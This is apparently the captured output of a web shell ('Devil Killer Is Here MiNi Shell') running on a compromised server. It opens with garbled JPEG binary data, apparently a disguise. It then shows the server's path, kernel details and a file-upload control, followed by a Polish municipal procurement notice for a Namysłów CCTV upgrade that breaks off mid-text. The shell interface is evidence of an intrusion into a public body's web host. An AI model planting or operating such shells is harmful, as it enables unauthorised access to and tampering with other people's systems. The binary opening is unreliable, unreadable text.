JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20250912/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20250912/0042079301-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Modernizacja i rozbudowa monitoringu miejskiego <br/>w Namysłowie </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Namysłów, reprezentowana przez Burmistrza Namysłowa</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 531413159</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Stanisława Dubois 3</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Namysłów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">46-100</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">opolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL523 - Nyski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@namyslow.eu</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.bip.namyslow.eu</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Modernizacja i rozbudowa monitoringu miejskiego <br/>w Namysłowie </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-ac323c3a-1c3a-446e-bc59-c6fba3352a78</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00420793</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-09-12</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00021318/17/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.29 Modernizacja i rozbudowa monitoringu miejskiego w Namysłowie</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> www.bip.namyslow.eu; https://namyslow.ezamawiajacy.pl/app/login. <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://namyslow.ezamawiajacy.pl/app/login</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne zgodnie z punktem 8 i 12 SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1.	Administratorem Pana/Pani danych osobowych jest Urząd Miejski reprezentowany przez Burmistrza Namysłowa z siedzibą w Namysłowie, przy ul. Stanisława Dubois 3. Może się Pan/Pani z nim skontaktować drogą elektroniczną na adres e-mail: urzad.miejski@namyslow.eu, telefonicznie pod numerem +48 77 41 90 300 lub tradycyjną pocztą na adres wskazany powyżej.<br/>2.	W sprawach związanych z Pana/Pani danymi proszę kontaktować się z Inspektorem Ochrony Danych pod adresem e-mail iod@comp-net.pl<br/>3.	Pana/Pani dane osobowe będą przetwarzane w celu związanym z postępowaniem o udzielenie zamówienia publicznego na „Modernizację i rozbudowę monitoringu miejskiego w Namysłowie”, nr IiZP.271.25.2025.KB prowadzonym w trybie podstawowym (art. 275. pkt 2 ustawy Pzp); na podstawie art. 6 ust. 1 lit. C RODO.<br/>4.	W niektórych sytuacjach Pana/Pani dane osobowe mogą być udostępniane, jeśli będzie <br/>to konieczne do wykonywania ustawowych zadań urzędu. Będziemy przekazywać dane wyłącznie:<br/>1)	podmiotom przetwarzającym, którym zlecimy przetwarzanie Pana/Pani danych;<br/>2)	innym odbiorcom danych, np. bankom, ubezpieczycielom, kancelariom prawnym.<br/>5.	Pana/Pani dane osobowe nie będą przekazywane do państwa trzeciego/organizacji międzynarodowej.<br/>6.	Pana/Pani dane osobowe będą przechowywane przez okres co najmniej 7 lat od dnia wpływu ostatniej płatności na konto beneficjenta (płatności na realizację projektu), a jeżeli zobowiązania wskazane w ofercie i umowie przekroczą w/w przedział czasowy, okres przechowywania obejmuje ten termin.<br/>7.	Ma Pan/Pani prawo dostępu do swoich danych, ich sprostowania, usunięcia lub ograniczenia przetwarzania.<br/>8.	Ma Pan/Pani prawo wniesienia sprzeciwu wobec przetwarzania.<br/>9.	Ma Pan/Pani prawo do cofnięcia zgody w dowolnym momencie. Skorzystanie z prawa <br/>do cofnięcia zgody nie ma wpływu na przetwarzanie, które miało miejsce do momentu wycofania zgody.<br/>10.	Ma Pan/Pani także prawo do przenoszenia danych.<br/>11.	Przysługuje Panu/Pani prawo wniesienia skargi do Organu Nadzorczego, gdy stwierdzi Pan/Pani naruszenie przetwarzania danych osobowych Pana/Pani dotyczących.<br/>12.	Podanie przez Pana/Panią danych osobowych jest wymogiem ustawowym określonym <br/>w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego. Jest Pan/Pani zobowiązany/a do ich podania, a konsekwencją niepodania danych osobowych będą konsekwencje wynikające z ustawy Pzp.<br/>13.	Pana/Pani dane nie będą przetwarzane w sposób zautomatyzowany, w tym również w formie profilowania.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Pozostałe informacje zostały zawarte w punkcie 20 dodatkowych postanowień SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">IiZP.271.25.2025.KB</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia są usługi transmisji danych wraz z licencjami wizyjnymi dla Systemu Monitoringu Wizyjnego w Namysłowie. <br/>Przedmiot zamówienia obejmuje kompleksowe uruchomienie systemu wraz z transmisją danych pomiędzy punktami kamerowymi a CPD (centralny punkt dystrybucyjny) oraz uruchomienie nowych lokalizacji.<br/>W ramach zamówienia jest realizacja usługi transmisji danych za pomocą ciemnych włókien lub dedykowanych radiolinii z punktów zbiorczych dla punktów kamerowych (PK) do serwera obsługi platformy zarzadzania obrazu Wykonawcy oraz licencje kanału wizyjnego wraz z archiwizacją obrazu na serwerze obsługi platformy zarządzania obrazu dla wszystkich punktów kamerowych i usługą:<br/>1)	91 sztuk licencji do analizy obiektów (analityka stanu kamery, zasłonięta kamera, zmiana sceny, analiza metadanych wygenerowanych przez kamery, detekcja ruchu, analiza ludzi i pojazdów, ruch <br/>w strefie, wejście/wyjście/pojawienie się w strefie, wałęsanie się, pozostawienie obiektu, analiza dostarczanych materiałów wideo ze źródeł obcych)<br/>2)	25 sztuk licencji do analizy obiektów (rozpoznawanie tablic rejestracyjnych, śledzenie poruszających się obiektów, wykrywanie obiektów w podziale na pojazdy lub obiekty, detekcja ognia lub dymu)<br/>Wykonawca (Operator) zapewni aplikację do obsługi systemu monitoringu w siedzibie Straży Miejskiej w Namysłowie. <br/>Punkty kamerowe (PK) muszą być podłączone do sieci transmisji danych z odczytem obrazu <br/>w Straży Miejskiej w Namysłowie (dworzec kolejowo-autobusowy).<br/>Przedmiot zamówienia obejmuje przyłączenie istniejącego systemu monitoringu do przedmiotu zamówienia w postaci dostarczenia strumieni wideo w lokalizacji CPD i obsługę strumieni na platformie zarządzania obrazu dla 37 sztuk strumieni. Specyfikacja strumieni video istniejącego monitoringu opisana została w załączniku nr 3 do SWZ. <br/><br/>Dla realizacji zamówienia niezbędna jest budowa Centralnego Punktu Dystrybucji. Obecnie CPD znajduje się w Ratuszu. Zamawiający dopuszcza zmianę lokalizacji CPD po zaakceptowaniu przedłożonej przez Wykonawcę koncepcji. <br/>PK – punkt kamerowy<br/>1)	PK nr 1 - ul. Dąbrowskiego/Parkowa, montaż 1 kamery na słupie obejmującej obszarem widzenia przejście dla pieszych ul. Parkowa Zestawienie transmisji danych za pomocą ciemnego włókna. <br/>2)	PK nr 2 - Wyspy na rzece Widawie, montaż 14 kamer na 5 słupach obejmujące obszar Wysp. Zestawienie transmisji danych za pomocą ciemnego włókna.<br/>3)	PK nr 3 – Namysłowski Ośrodek Kultury - Plac Powstańców Śląskich, montaż 2 kamer na budynkach (1 szt. na NOK i 1 szt. na sali gimnastycznej) obejmujących plac przed Nok oraz obszar przy murach obronnych. Zestawienie transmisji danych za pomocą ciemnego włókna.<br/>4)	PK nr 4 - Park Kopernika, montaż 3 kamer statycznych na jednym słupie, obejmujących plac zabaw, przejście na osiedle. Zestawienie transmisji danych za pomocą ciemnego włókna.<br/>5)	PK nr 5 – modernizacja istniejącego punktu kamerowego na budynku Powiatowego Urzędu Pracy polegająca na zestawieniu transmisji danych za pomocą ciemnego włókna do istniejącego PK. <br/>6)	PK nr 6 - ul. Oleśnicka/Sycowska, montaż 3 kamer na 1 słupie obejmujących obszarem widzenia całe skrzyżowanie. Zestawienie transmisji danych za pomocą ciemnego włókna.<br/>7)	PK nr 7 - Basen, wykorzystanie strumieni z istniejących kamer. Zestawienie transmisji danych za pomocą ciemnego włókna.<br/>8)	PK nr 8 – Stadion, montaż 2 kamer statycznych na budynku obejmująca obszarem widzenia wejście na stadion. Zestawienie transmisji danych za pomocą ciemnego włókna.<br/>9)	PK nr 9 - Plac pod Grzybkiem, montaż 4 kamer statycznych na dwóch słupach obejmujące obszarem widzenia park. Zestawienie transmisji danych za pomocą ciemnego włókna.<br/>10)	PK nr 10 – Plac pod Grzybkiem staw, montaż 2 kamer statycznych na słupie obejmujące obszarem widzenia linię brzegową. Zestawienie transmisji danych za pomocą ciemnego włókna.<br/>11)	PK nr 11 – ul. Oławska (wylot ul. Podleśna /ul. Sosnowa, montaż 2 kamer statycznych na słupie, obejmujące obszarem widzenia ul. Oławską. Zestawienie transmisji danych za pomocą ciemnego włókna.<br/>12)	PK nr 12 – ul. Jana Pawła II (rondo NSZZ Solidarności), montaż 2 kamer statycznych na słupie, obejmującą obszarem widzenia kierunek ul. Jana Pawła II (wlot/wylot). Zestawienie transmisji danych za pomocą ciemnego włókna.<br/>13)	PK nr 13 - Urząd Miasta / Wały Jana III, montaż 2 kamer statycznych na rogu budynku UM. Zestawienie transmisji danych za pomocą ciemnego włókna lub dedykowanej radiolinii.<br/>14)	PK nr 14 - Skrzyżowanie ul. Stanisława Dubois / ul. Szkolna (Izba Regionalna), montaż 2 kamer statycznych na budynku. Zestawienie transmisji danych za pomocą ciemnego włókna lub dedykowanej radiolinii.<br/>15)	PK nr 15 - Targowisko + Teren byłego PKS, montaż 4 kamer statycznych na maszcie na budynku. Zestawienie transmisji danych za pomocą ciemnego włókna lub dedykowanej radiolinii.<br/>16)	PK nr 16 - Orlik Kolejowa, montaż 2 kamer statycznych na istniejącym słupie oświetleniowym. Zestawienie transmisji danych za pomocą ciemnego włókna lub dedykowanej radiolinii.<br/>17)	PK nr 17 - Hala Orla, montaż 1 kamery na budynku. Zestawienie transmisji danych za pomocą ciemnego włókna lub dedykowanej radiolinii.<br/>18)	PK nr 18 - Tama Michalice, montaż 2 kamer na budynku tamy. Zestawienie transmisji danych za pomocą ciemnego włókna lub dedykowanej radiolinii.<br/>Wymagania dotyczące nowo instalowanych kamer:<br/>1)	Rozdzielczość nie mniej niż 8 Mpix przy 20 kl/s,<br/>2)	Kąt widzenia w zakresie 70 – 105 stopni,<br/>3)	Zasięg oświetlacza IR nie mniej niż 35 metrów,<br/>4)	Zasięg oświetlacza światła białego nie mniej niż 35 metrów,<br/>5)	Obsługa kodeka H.265,<br/>6)	Wbudowany mikrofon wraz z przesyłem dźwięku,<br/>7)	Interfejs sieciowy minimum 10/100 Mbit/s,<br/>8)	Obudowa wandaloodporna – metalowa,<br/>9)	Klasa szczelności nie mniej niż IP67,<br/>10)	Temperatury pracy w zakresie -30 °C do 60 °C<br/>Wymagania dotyczące instalowanych słupów:<br/>1)	Wysokość w zakresie 3-6 metrów w zależności od lokalnych uwarunkowań. Konieczność dostosowania wysokości przez Wykonawcę pod kątem optymalnego obszaru objętego monitoringiem.<br/>2)	Przeznaczone do montażu kamer<br/>3)	Odporne na korozję, stalowe lub aluminiowe. <br/>Nowe punkty kamerowe wymagają przyłączenia i realizacji transmisji danych po ciemnych włóknach lub dedykowanych radiolinii. <br/>Wykonawca w ramach przedmiotu zamówienia zapewni:<br/>1)	91 sztuk licencji do analizy obiektów (analityka stanu kamery, zasłonięta kamera, zmiana sceny, analiza metadanych wygenerowanych przez kamery, detekcja ruchu, analiza ludzi i pojazdów, ruch w strefie, wejście/wyjście/pojawienie się w strefie, wałęsanie się, pozostawienie obiektu, analiza dostarczanych materiałów wideo ze źródeł obcych).<br/>2)	25 sztuk licencji do analizy obiektów (rozpoznawanie tablic rejestracyjnych, śledzenie poruszających się obiektów, wykrywanie obiektów w podziale na pojazdy lub obiekty, detekcja ognia lub dymu).<br/>Stosowane przez Wykonawcę i Zamawiającego środki techniczne wykorzystywane w związku ze świadczeniem usługi transmisji danych po ciemnych włóknach oraz dedykowanych radiolinii muszą gwarantować bezpieczeństwo przekazu informacji. Zamawiający nie dopuszcza możliwości korzystania <br/>z usług transmisji danych współdzielonej z innymi podmiotami w jednym włóknie światłowodowym.<br/><br/>W ramach wykonania przedmiotu umowy Wykonawca zobowiązany jest do:<br/>1)	zapewnienia prawidłowości działania transmisji danych po ciemnych włóknach oraz dedykowanych radiolinii w jakości zgodnej z wymaganiami technicznymi przez okres 36 m-cy;<br/>2)	bieżącej kontroli usług, w celu zagwarantowania właściwych parametrów, sprawowanej poprzez systemy utrzymania i zdalnego nadzoru Wykonawcy;<br/>3)	usuwania uszkodzeń i awarii transmisji danych Wykonawcy powstałych z przyczyn nie zawinionych przez Zamawiającego;<br/>4)	zapewnienia Zamawiającemu kontaktu telefonicznego, realizowanego na telefon <br/>oraz email (obsługiwany całodobowo) z centrum zarządzania siecią Wykonawcy, celem utrzymania stałego kontaktu;<br/>5)	zapewnienia prawidłowego działania sieci światłowodowej oraz radiolinii;<br/>6)	wszelkie koszty niezbędne do utrzymania transmisji danych oraz demontaż urządzeń będących własnością Wykonawcy po zakończeniu świadczenia usługi oraz koszty licencji <br/>i subskrypcji na okres 36 m-cy, muszą zostać wkalkulowane w wartość oferty;<br/>7)	przywrócenia do stanu pierwotnego w przypadku uszkodzeń elewacji, dachu, tynków lub istniejących instalacji powstałych podczas montażu i demontażu urządzeń dostępowych na własny koszt;<br/>8)	zapewnienia aktywnego urządzenia końcowego do obsługi każdego punktu kamerowego wyposażonego w niezbędną ilość portów, o prędkości przesyłu danych min 25 Mbit/s dla każdej kamery. <br/>9)	dla łączy światłowodowych:<br/>a)	zapewnienia odpowiedniego rodzaju zastosowanego medium transmisyjnego i osprzętu przystosowanego do transmisji,<br/>b)	udostępnienia łączy światłowodowych do eksploatacji poprzedzonych testami sprawdzającymi poprawność działania;<br/>10)	dla serwera monitoringu zapewnienie przez aplikację operatora obsługi wielu (min. 3) ekranów do obsługi systemu video oraz lokalizację serwera nagrywającego obraz. <br/>11)	zapewnienie gwarancji miesięcznej i rocznej dostępności usługi na poziomie 99,5 %.<br/><br/>Wykonawca przed przystąpieniem do realizacji prac przedstawi Zamawiającemu koncepcję systemu monitoringu z rozmieszczeniem kamer i wraz z obszarem objęcia systemem monitoringu. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">72318000-7 - Usługi przesyłu danych</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">72317000-0 - Usługi przechowywania danych</p> <p class="mb-0">72316000-3 - Usługi analizy danych</p> <p class="mb-0">35120000-1 - Systemy i urządzenia nadzoru i bezpieczeństwa</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">75 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas reakcji na zgłoszenie</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas naprawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:<br/>1)	nie podlegają wykluczeniu, na podstawie art. 108 ust. 1 ustawy Pzp i art. 109 ust. 1 pkt 4 ustawy Pzp, z zachowaniem przepisów art. 109 ust. 3, art. 110, art. 111 ustawy Pzp, oraz nie podlegają wykluczeniu na podstawie art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. <br/>o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego,<br/>2) spełniają warunki udziału w postępowaniu dotyczące:<br/>a)	zdolności do występowania w obrocie gospodarczym: Nie dotyczy.<br/>b)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, <br/>o ile wynika to z odrębnych przepisów: Nie dotyczy <br/>c) sytuacji ekonomicznej lub finansowej: Nie dotyczy.<br/>d) zdolności technicznej lub zawodowej: Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca wykaże w okresie ostatnich 3 lat przed upływem terminu składania ofert (a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie):<br/> wykonanie co najmniej jednej usługi związanej z budową systemów monitoringów miejskich, transmisją danych oraz dostawą licencji systemów analizy obrazu, o wartości co najmniej 300.000,00 zł brutto.<br/>Do przeliczenia wartości określonej w niniejszym punkcie, a występującej w innej walucie niż złoty (PLN), Zamawiający zastosuje średni kurs Narodowego Banku Polskiego (NBP) z dnia opublikowania ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych.<br/>W przypadku wykazania przez Wykonawcę większej ilości usług, Zamawiający w celu dokonania oceny spełnienia w/w warunku będzie brał pod uwagę tylko ilość usług wymaganych przez Zamawiającego.<br/>Do wykazanych pozycji muszą być załączone dowody określające, czy te dostawy lub usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego dostawy lub usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - oświadczenie wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy.<br/>W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych <br/>lub 